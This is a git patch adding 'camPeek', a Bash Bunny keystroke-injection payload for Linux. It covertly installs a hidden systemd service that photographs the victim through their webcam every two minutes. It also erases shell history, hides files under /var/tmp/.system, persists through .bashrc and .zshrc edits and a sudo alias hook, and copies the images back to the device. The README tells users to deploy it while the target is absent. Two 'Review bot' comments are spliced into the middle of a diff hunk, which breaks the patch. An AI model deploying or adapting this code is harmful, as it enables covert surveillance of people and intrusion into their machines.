From 7bd90b7308260397a638fde6765459a7b8288836 Mon Sep 17 00:00:00 2001
From: drapl0n <87269662+drapl0n@users.noreply.github.com>
Date: Fri, 1 Apr 2022 21:35:39 +0530
Subject: [PATCH] uploaded camPeek (#508)

* uploaded camPeek camPeek payload peeks through targets web cam and capture images
* Delete payload.txt
* uploading payload
---
payloads/library/execution/camPeek/README.md | 55 ++++++++++++++++++
.../execution/camPeek/camPeek/payload.sh | 18 ++++++
.../library/execution/camPeek/camPeek/shell | 12 ++++
.../execution/camPeek/camPeek/systemBus | 5 ++
.../execution/camPeek/switch1/payload.txt | 56 +++++++++++++++++++
.../execution/camPeek/switch2/payload.txt | 43 ++++++++++++++
6 files changed, 189 insertions(+)
create mode 100644 payloads/library/execution/camPeek/README.md
create mode 100644 payloads/library/execution/camPeek/camPeek/payload.sh
create mode 100644 payloads/library/execution/camPeek/camPeek/shell
create mode 100644 payloads/library/execution/camPeek/camPeek/systemBus
create mode 100644 payloads/library/execution/camPeek/switch1/payload.txt
create mode 100644 payloads/library/execution/camPeek/switch2/payload.txt
diff --git a/payloads/library/execution/camPeek/README.md b/payloads/library/execution/camPeek/README.md
new file mode 100644
index 00000000..4c6863c5
--- /dev/null
+++ b/payloads/library/execution/camPeek/README.md
@@ -0,0 +1,55 @@
+## About:
+* Title: camPeek
+* Description: camPeek payload peeks through targets web cam and capture images and stores them in bunny.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Execution
+* Target: Unix-like operating systems with systemd.
+* Attackmodes: HID, Storage
+
+## CamPeek: camPeek payload is divided into two modules, First peeks through targets web cam and capture images and Second stores them in bunny.
+
+### Features:
+* Robust Payload for capturing targets images.
+* No additional dependencies required.
+* Persistent.
+* Autostart payload on boot.
+
+### Payload:
+* Payload is divided into two modules:
+1) Deployment: In this stage payload is deployed in targets system.
+2) Exfiltration: Storing saved loot from targets system in bunny.
+
+### Payload Script's Workflow:
+* Stop storing histroy.
+* Grep bunny's mount point of bunny.
+* Creating hidden directory in /var/tmp/..... for obfuscation.
+* Copying ffmpeg and image capturing mechanism in target's system.
+* Creating systemd service for persistance and triggering mechanism for autostart.
+
+### Changes to be made:
+* Change time interval of capturing image, more the time interval target gets less suspicious, default time interval is 120 secs. Make changes in `systemBus` on line number `4`.
+
+### LED Status:
+* `SETUP` : MAGENTA
+* `ATTACK` : YELLOW
+* `FINISH` : GREEN
+
+### Note:
+* Download pre compiled static build of ffmpeg from: https://github.com/drapl0n/temp/releases/download/ffmpeg/ffmpeg and move it in camPeek directory.
+* Due to big size of binary, it is not provided in this repo.
+* Craete directory name `camPeek` in `/loot/` for storing captured images.
+
+### Directory Structure of payload components:
+| FileName | Directory |
+| -------------- | ----------------------------- |
+| switch1/payload.txt | /payloads/switch1/ |
+| switch2/payload.txt | /payloads/switch2/ |
+| camPeek/ | /payloads/libray/ |
+
+### Usage:
+1. Deploy first payload during absence of target using `switch1`.
+2. Execute second payload during absence of target to store captured images in bunny using `switch2`.
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n
diff --git a/payloads/library/execution/camPeek/camPeek/payload.sh b/payloads/library/execution/camPeek/camPeek/payload.sh
new file mode 100644
index 00000000..3759ce12
--- /dev/null
+++ b/payloads/library/execution/camPeek/camPeek/payload.sh
@@ -0,0 +1,18 @@
+#!/bin/bash
+unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
+mkdir /var/tmp/.system
+lol=$(lsblk | grep 1.8G)
+disk=$(echo $lol | awk '{print $1}')
+mntt=$(lsblk | grep $disk | awk '{print $7}')
+cp -r $mntt/payloads/library/camPeek/ffmpeg /var/tmp/.system/
+chmod +x /var/tmp/.system/ffmpeg
+mkdir /var/tmp/.system/sysLog
+cp -r $mntt/payloads/library/camPeek/systemBus /var/tmp/.system/systemBus
+chmod +x /var/tmp/.system/systemBus
+mkdir -p ~/.config/systemd/user
+echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
+systemctl --user daemon-reload
+systemctl --user enable --now systemBUS.service
+systemctl --user start --now systemBUS.service
+cp -r $mntt/payloads/library/camPeek/shell /tmp/
+chmod +x /tmp/shell && /tmp/./shell && rm /tmp/shell
diff --git a/payloads/library/execution/camPeek/camPeek/shell b/payloads/library/execution/camPeek/camPeek/shell
new file mode 100644
index 00000000..2b46e3d3
--- /dev/null
+++ b/payloads/library/execution/camPeek/camPeek/shell
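Review bot: The Note section tells readers to fetch a prebuilt `ffmpeg` from a personal GitHub release URL with no checksum or signature, while the Features list says `* No additional dependencies required.`; the two statements contradict each other, and an unverified binary that the deployment script copies onto a host is a supply-chain risk for whoever runs this in a lab. Record the expected digest next to the URL, e.g. `* SHA-256 of ffmpeg: <sha256 placeholder — fill in from the release>`, or point readers to building a static ffmpeg from upstream source, and reword the bullet to `* Only dependency: a static ffmpeg build (see Note).` The component table lists `/payloads/libray/` where the diffstat path is `payloads/library/execution/camPeek/`, and "histroy", "persistance" and "Craete" are misspelled.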
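Review bot: Neither this script nor the README records what the payload leaves on the host — `/var/tmp/.system` (holding `ffmpeg`, `systemBus` and the `sysLog` capture directory), the user unit `~/.config/systemd/user/systemBUS.service`, and the lines the `shell` hunk appends to `~/.zshrc` and `~/.bashrc` — so a lab that deploys it has no cleanup checklist and no artifact list to validate detections against. Add a "Cleanup / artifacts" section to the README enumerating those paths and the `systemctl --user disable --now systemBUS.service` step needed before removing them. The same gap applies to the `shell` hunk, whose file has no header comment; a one-liner such as `# appends a sudo alias and a service (re)start line to ~/.zshrc and ~/.bashrc` would state what it modifies.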
@@ -0,0 +1,12 @@
+#!/bin/bash
+ls -a ~/ | grep 'zshrc' &> /dev/null
+if [ $? = 0 ]; then
+ echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.zshrc
+ echo "systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service" >> ~/.zshrc
+fi
+
+ls -a ~/ | grep 'bashrc' &> /dev/null
+if [ $? = 0 ]; then
+ echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.bashrc
+ echo "systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service" >> ~/.bashrc
+fi
diff --git a/payloads/library/execution/camPeek/camPeek/systemBus b/payloads/library/execution/camPeek/camPeek/systemBus
new file mode 100644
index 00000000..f23d223c
--- /dev/null
+++ b/payloads/library/execution/camPeek/camPeek/systemBus
@@ -0,0 +1,5 @@
+while true;
+do
+ /var/tmp/.system/./ffmpeg -f video4linux2 -i /dev/video0 -vframes 1 -video_size 640x480 /var/tmp/.system/sysLog/$(date +%Y%m%d-%H%M%S).png
+ sleep 120
+done
diff --git a/payloads/library/execution/camPeek/switch1/payload.txt b/payloads/library/execution/camPeek/switch1/payload.txt
new file mode 100644
index 00000000..c251c817
--- /dev/null
+++ b/payloads/library/execution/camPeek/switch1/payload.txt
@@ -0,0 +1,56 @@
+# Title: camPeek
+# Description: camPeek payload peeks through targets web cam and capture images.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution
+# Target: GNU/Linux operating systems with systemd.
+# Attackmodes: HID, Storage.
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering payload script]
+Q STRING cp -r '$mntt'/payloads/library/camPeek/payload.sh /tmp/
+Q ENTER
+Q STRING chmod +x /tmp/payload.sh
+Q ENTER
+Q STRING /tmp/./payload.sh
+Q ENTER
+Q DELAY 12000
+Q STRING rm /tmp/payload.sh
+Q ENTER
+Q DELAY 500
+
+# [Unmounting BashBunny]
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+Q STRING exit
+Q ENTER
+LED FINISH
diff --git a/payloads/library/execution/camPeek/switch2/payload.txt b/payloads/library/execution/camPeek/switch2/payload.txt
new file mode 100644
index 00000000..b478df1f
--- /dev/null
+++ b/payloads/library/execution/camPeek/switch2/payload.txt
@@ -0,0 +1,43 @@
+# Title: camPeek
+# Description: camPeek payload's exfilteration module to move captured images to bunny.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution
+# Target: GNU/Linux operating systems with systemd.
+# Attackmodes: HID, Storage.
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering payload script]
+# create directory named camPeek in /loot/
+Q STRING mv /var/tmp/.system/sysLog/* '$mntt'/loot/camPeek/ \&
+Q ENTER
+Q STRING disown \&\& exit
+Q ENTER